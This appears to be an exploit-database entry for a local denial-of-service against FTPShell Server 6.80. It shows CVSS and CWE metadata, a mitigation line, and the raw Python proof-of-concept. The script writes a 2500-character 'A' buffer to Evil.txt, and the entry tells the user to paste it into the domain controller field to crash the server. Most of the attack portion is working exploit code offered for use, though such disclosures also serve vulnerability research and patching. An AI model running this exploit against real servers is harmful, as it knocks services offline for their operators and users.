header-logo
Suggest Exploit
vendor:
FTPShell Server
by:
Hashim Jawad
5.5
CVSS
MEDIUM
Local Denial of Service
CWE
Product Name: FTPShell Server
Affected Version From: 6.8
Affected Version To: 6.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Enterprise - SP1 (x86)
2018

FTPShell Server 6.80 – Local Denial of Service

This exploit creates a malicious payload that causes a denial of service on FTPShell Server 6.80. It creates a file called Evil.txt containing a buffer of 2500 characters, filled with 'A' characters.

Mitigation:

Update FTPShell Server to a non-vulnerable version or apply a patch if available.
Source

Exploit-DB raw data:

# Exploit Title: FTPShell Server 6.80 - Local Denial of Service
# Exploit Author: Hashim Jawad
# Date: 2018-05-23
# Vendor Homepage: http://www.ftpshell.com/
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field

#!/usr/bin/python

buffer = '\x41' * 2500

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

Navigation

Suggest Exploit

Services By CQR